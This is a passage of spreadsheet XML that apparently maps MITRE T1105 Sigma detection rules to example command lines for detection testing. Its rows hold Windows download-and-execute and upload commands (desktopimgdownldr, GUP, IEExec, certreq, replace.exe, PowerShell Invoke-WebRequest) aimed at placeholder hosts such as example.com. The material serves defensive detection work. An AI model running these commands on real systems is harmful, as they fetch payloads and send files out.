      <c r="G467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I467" s="43" t="n"/>
      <c r="J467" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K467" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B468" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C468" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D468" s="43" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E468" s="43" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe /lockscreenurl:http://example.com/payload.exe /dest:C:\Users\User\AppData\Local\Temp\payload.exe</t>
        </is>
      </c>
      <c r="F468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I468" s="43" t="n"/>
      <c r="J468" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K468" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B469" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C469" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D469" s="43" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E469" s="43" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe /lockscreenurl:http://example.com/payload.exe /dest:%temp%\payload.exe</t>
        </is>
      </c>
      <c r="F469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I469" s="43" t="n"/>
      <c r="J469" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K469" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B470" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C470" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D470" s="43" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E470" s="43" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe /lockscreenurl:http://example.com/payload.exe /dest:C:/Temp/payload.exe</t>
        </is>
      </c>
      <c r="F470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I470" s="43" t="n"/>
      <c r="J470" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K470" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B471" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_susp_execution</t>
        </is>
      </c>
      <c r="C471" s="43" t="inlineStr">
        <is>
          <t>Suspicious Desktopimgdownldr Command</t>
        </is>
      </c>
      <c r="D471" s="43" t="inlineStr">
        <is>
          <t>bb58aa4a-b80b-415a-a2c0-2f65a4c81009</t>
        </is>
      </c>
      <c r="E471" s="43" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe -lockscreenurl:http://example.com/payload.exe /eventName:desktopimgdownldr</t>
        </is>
      </c>
      <c r="F471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I471" s="43" t="n"/>
      <c r="J471" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B472" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_susp_execution</t>
        </is>
      </c>
      <c r="C472" s="43" t="inlineStr">
        <is>
          <t>Suspicious Desktopimgdownldr Command</t>
        </is>
      </c>
      <c r="D472" s="43" t="inlineStr">
        <is>
          <t>bb58aa4a-b80b-415a-a2c0-2f65a4c81009</t>
        </is>
      </c>
      <c r="E472" s="43" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe /lockscreenurl:http://example.com/payload.exe?bypass=.jpg /eventName:desktopimgdownldr</t>
        </is>
      </c>
      <c r="F472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I472" s="43" t="n"/>
      <c r="J472" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K472" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B473" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C473" s="43" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D473" s="43" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E473" s="43" t="inlineStr">
        <is>
          <t>GUP.exe -unzipTo=C:\Temp "h t t p : / / example.com/payload.zip"</t>
        </is>
      </c>
      <c r="F473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="43" t="n"/>
      <c r="J473" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B474" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C474" s="43" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D474" s="43" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E474" s="43" t="inlineStr">
        <is>
          <t>GUP.exe -unzipTo=C:\Temp http://example.com/payload.zip</t>
        </is>
      </c>
      <c r="F474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I474" s="43" t="n"/>
      <c r="J474" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K474" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B475" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ieexec_download</t>
        </is>
      </c>
      <c r="C475" s="43" t="inlineStr">
        <is>
          <t>File Download And Execution Via IEExec.EXE</t>
        </is>
      </c>
      <c r="D475" s="43" t="inlineStr">
        <is>
          <t>9801abb8-e297-4dbf-9fbd-57dde0e830ad</t>
        </is>
      </c>
      <c r="E475" s="43" t="inlineStr">
        <is>
          <t>IEExec.exe http://example.com/payload.exe</t>
        </is>
      </c>
      <c r="F475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I475" s="43" t="n"/>
      <c r="J475" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K475" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B476" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C476" s="43" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D476" s="43" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E476" s="43" t="inlineStr">
        <is>
          <t>diantz.exe payload.exe C:\Windows\Tasks\archive.cab -v</t>
        </is>
      </c>
      <c r="F476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I476" s="43" t="n"/>
      <c r="J476" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K476" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B477" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C477" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D477" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E477" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A</t>
        </is>
      </c>
      <c r="F477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I477" s="43" t="n"/>
      <c r="J477" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K477" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B478" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C478" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D478" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E478" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "\\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A</t>
        </is>
      </c>
      <c r="F478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I478" s="43" t="n"/>
      <c r="J478" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K478" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B479" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C479" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D479" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E479" s="43" t="inlineStr">
        <is>
          <t>replace.exe payload.exe C:\target\directory</t>
        </is>
      </c>
      <c r="F479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I479" s="43" t="n"/>
      <c r="J479" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B480" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C480" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D480" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E480" s="43" t="inlineStr">
        <is>
          <t>replace.exe payload.exe C:\target\directory /A</t>
        </is>
      </c>
      <c r="F480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I480" s="43" t="n"/>
      <c r="J480" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K480" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B481" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C481" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D481" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E481" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp -a</t>
        </is>
      </c>
      <c r="F481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I481" s="43" t="n"/>
      <c r="J481" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K481" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B482" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C482" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D482" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E482" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A /V</t>
        </is>
      </c>
      <c r="F482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H482" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I482" s="43" t="n"/>
      <c r="J482" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K482" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B483" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C483" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D483" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E483" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A /S</t>
        </is>
      </c>
      <c r="F483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I483" s="43" t="n"/>
      <c r="J483" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K483" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C484" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D484" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E484" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A /F</t>
        </is>
      </c>
      <c r="F484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I484" s="43" t="n"/>
      <c r="J484" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B485" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C485" s="43" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D485" s="43" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E485" s="43" t="inlineStr">
        <is>
          <t>certreq.exe -Post -config "http://example.com" C:\windows\win.ini C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I485" s="43" t="n"/>
      <c r="J485" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C486" s="43" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D486" s="43" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E486" s="43" t="inlineStr">
        <is>
          <t>certreq.exe /Post /config http://example.com C:\windows\win.ini</t>
        </is>
      </c>
      <c r="F486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I486" s="43" t="n"/>
      <c r="J486" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B487" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C487" s="43" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D487" s="43" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E487" s="43" t="inlineStr">
        <is>
          <t>certreq.exe -Post -config http://example.com C:\windows\win.ini</t>
        </is>
      </c>
      <c r="F487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I487" s="43" t="n"/>
      <c r="J487" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C488" s="43" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D488" s="43" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E488" s="43" t="inlineStr">
        <is>
          <t>certreq.exe -config http://example.com -Post C:\windows\win.ini</t>
        </is>
      </c>
      <c r="F488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I488" s="43" t="n"/>
      <c r="J488" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K488" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B489" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C489" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D489" s="43" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E489" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body (Get-Content C:\Windows\System32\notepad.exe)}"</t>
        </is>
      </c>
      <c r="F489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H489" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I489" s="43" t="n"/>
      <c r="J489" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K489" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B490" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C490" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D490" s="43" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E490" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest 'https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT' -UseBasicParsing).Content }}"</t>
        </is>
      </c>
      <c r="F490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H490" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I490" s="43" t="n"/>
      <c r="J490" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K490" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B491" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C491" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D491" s="43" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E491" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {for($i=0; $i -le 1000; $i++) { (iwr 'https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT' -UseBasicParsing).Content }}"</t>
        </is>
      </c>
      <c r="F491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I491" s="43" t="n"/>
      <c r="J491" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K491" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B492" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C492" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D492" s="43" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E492" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1 -OutFile C:\Users\Public\safe.txt"</t>
        </is>
      </c>
      <c r="F492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I492" s="43" t="n"/>
      <c r="J492" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K492" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="493" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B493" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C493" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D493" s="43" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E493" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "iwr -URI https://example.com -OutFile C:\Users\Public\example.txt"</t>
        </is>
      </c>
      <c r="F493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I493" s="43" t="n"/>
      <c r="J493" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B494" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C494" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D494" s="43" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E494" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "wget -Uri https://example.com -OutFile C:\Users\Public\example.txt"</t>
        </is>
      </c>
      <c r="F494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I494" s="43" t="n"/>
      <c r="J494" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K494" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C495" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D495" s="43" t="inlineStr">
        <is>
